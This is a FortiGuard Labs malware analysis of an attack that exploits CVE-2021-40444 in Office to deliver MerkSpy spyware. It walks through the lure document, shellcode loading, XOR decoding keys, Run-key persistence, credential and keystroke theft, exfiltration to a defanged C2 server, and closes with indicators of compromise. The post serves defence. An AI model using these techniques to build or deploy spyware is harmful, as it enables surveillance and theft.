Affected Platforms: Microsoft Windows
Impacted Users: Microsoft Windows
Impact: The stolen information can be used for future attack
Severity Level: High
Spyware is malicious software engineered to covertly monitor and gather information from a user’s computer without their awareness or consent. It can record activities like keystrokes, browsing behavior, and personal information, often transmitting this data to a third party for espionage or theft.
FortiGuard Labs recently detected an attack exploiting the CVE-2021-40444 vulnerability in Microsoft Office. This flaw allows attackers to execute malicious code via specially crafted documents. In this instance, the exploitation led to the deployment of a spyware payload known as “MerkSpy.” MerkSpy is designed to clandestinely monitor user activities, capture sensitive information, and establish persistence on compromised systems.
This blog will dissect the stages of this complex attack, offering insights into the techniques used by cybercriminals to infiltrate systems and steal sensitive data.
The initial vector for this attack is a deceptive Microsoft Word document posing as a job description for a software developer position.
Opening the document triggers the exploitation of CVE-2021-40444, a remote code execution vulnerability within the MSHTML component used by Internet Explorer in Microsoft Office. This vulnerability permits an attacker to execute arbitrary code on a victim’s machine without additional user interaction beyond opening the document. The attacker conceals the URL within the “\_rels\document.xml” file. It directs to hxxp://45[.]89[.]53[.]46/google/olerender[.]html, downloading an HTML file that sets the stage for the next phase of the attack.
Figure 3: \_rels\document.xml
After the successful exploitation, the malicious document initiates the downloaded payload, “olerender.html,” from a remote server. This HTML file is strategically crafted, with innocuous script filling the beginning to mask its true intent. The end of the file conceals the shellcode and injection process, which propels the attack forward when executed on the victim’s machine.
Figure 5: Code at the end of olerender.html
“olerender.html” first checks the system’s OS version. If it detects an X64 architecture, it extracts the embedded “sc_x64” shellcode.
After determining the OS version and extracting the appropriate shellcode, “olerender.html” locates and retrieves the Windows APIs “VirtualProtect” and “CreateThread.” These functions are crucial for the following steps: it leverages “VirtualProtect” to modify memory permissions, allowing the decoded shellcode to be written into memory securely. Following this, “CreateThread” executes the injected shellcode, setting the stage for downloading and executing the next payload from the attacker’s server. This process ensures that the malicious code runs seamlessly, facilitating further exploitation.
Figure 7: Retrieving the Windows APIs
Figure 8: Decoding the shellcode via XOR
Figure 9: Writing and invoking the shellcode
Once the shellcode is in place, it functions as a downloader, initiating the next phase of the attack. It reaches out to the same remote server to fetch a file, deceptively named “GoogleUpdate.” Despite its seemingly innocuous name, “GoogleUpdate” is far from benign. This file harbors the core malicious payload, which is deeply encoded to evade detection by standard security measures. Upon successful download, the shellcode meticulously decodes and prepares this payload for execution.
Figure 10: Downloaded "GoogleUpdate"
Once “GoogleUpdate” is downloaded, the shellcode decodes the file using an XOR key of 0x25021420 and an increment value of 0x00890518. This decryption process is crucial as it extracts the concealed actual payload embedded within the file. By employing these specific cryptographic techniques, the shellcode ensures that the malicious content remains hidden, allowing the attacker to execute their intended operations on the compromised system effectively.
Figure 11: XOR-decoded file and its payload injection
The extracted payload is protected with VMProtect. Its primary function is seamlessly injecting the MerkSpy spyware into crucial system processes. MerkSpy spyware operates covertly within a system, enabling it to capture sensitive information, monitor user activities, and exfiltrate data to remote servers controlled by malicious actors.
Figure 12: A file's information shown using the DIE (Detect It Easy) tool
MerkSpy achieves persistence by masquerading as “Google Update,” adding a registry entry for “GoogleUpdate.exe” in “Software\Microsoft\Windows\CurrentVersion\Run.” This deceptive tactic ensures that MerkSpy launches automatically at system startup, enabling continuous operation and data exfiltration without the user’s knowledge or consent.
Figure 13: Creating a registry entry
Following its installation, MerkSpy initiates the exfiltration process and begins monitoring specific targets: capturing screenshots, logging keystrokes, retrieving Chrome login credentials, and accessing the MetaMask extension. Once it gathers this data, MerkSpy uploads the collected information to the attacker’s server through the URL hxxp://45[.]89[.]53[.]46/google/update[.]php.
Figure 14: Switch cases of monitoring a compromised endpoint
The POST request employs a user agent string of “WINDOWS” and uses a fixed boundary, “---------------------------update request,” indicating it is a multi-part form-data submission. The request body is comprised of multiple parts:
Based on telemetry from the C2 server at “45[.]89[.]53[.]46,” a significant activity spike began at the end of May, primarily targeting North America and India.
The initial phase of the attack leverages a vulnerability in the MSHTML component used by Internet Explorer. Upon exploitation, it initiates the download of a file named “olerender.html,” which contains JavaScript and embedded shellcode. This shellcode decodes the downloaded content to execute an injector responsible for loading the MerkSpy spyware into memory and integrating it with active system processes. MerkSpy is capable of sophisticated surveillance activities, including keystroke logging, screenshot capture, and harvesting Chrome browser login data. By understanding the intricacies of this attack chain, organizations can enhance their readiness and deploy effective defenses against such intrusions. FortiGuard Labs remains vigilant in monitoring these threats and offers ongoing intelligence to safeguard our users.
The malware described in this report is detected and blocked by FortiGuard Antivirus as:
MSOffice/Agent.AN!tr
HTML/Agent.SC!tr
Data/Agent.C1FT!tr
W64/Injector.SRQ!tr
FortiGate, FortiMail, FortiClient, and FortiEDR support the FortiGuard AntiVirus service. The FortiGuard AntiVirus engine is part of each of these solutions. As a result, customers who have these products with up-to-date protections are protected.
The FortiGuard CDR (content disarm and reconstruction) service, which runs on both FortiGate and FortiMail, can disarm the malicious macros in the document.
We also suggest that organizations go through Fortinet’s free NSE training module: NSE 1 – Information Security Awareness. This module is designed to help end users learn how to identify and protect themselves from phishing attacks.
FortiGuard IP Reputation and Anti-Botnet Security Service proactively block these attacks by aggregating malicious source IP data from the Fortinet distributed network of threat sensors, CERTs, MITRE, cooperative competitors, and other global sources that collaborate to provide up-to-date threat intelligence about hostile sources.
If you believe this or any other cybersecurity threat has impacted your organization, please contact our Global FortiGuard Incident Response Team.
45[.]89[.]53[.]46
92eb60179d1cf265a9e2094c9a54e025597101b8a78e2a57c19e4681df465e08
95a3380f322f352cf7370c5af47f20b26238d96c3ad57b6bc972776cc294389a
0ffadb53f9624950dea0e07fcffcc31404299230735746ca43d4db05e4d708c6
dd369262074466ce937b52c0acd75abad112e395f353072ae11e3e888ac132a8
569f6cd88806d9db9e92a579dea7a9241352d900f53ff7fe241b0006ba3f0e22
6cdc2355cf07a240e78459dd4dd32e26210e22bf5e4a15ea08a984a5d9241067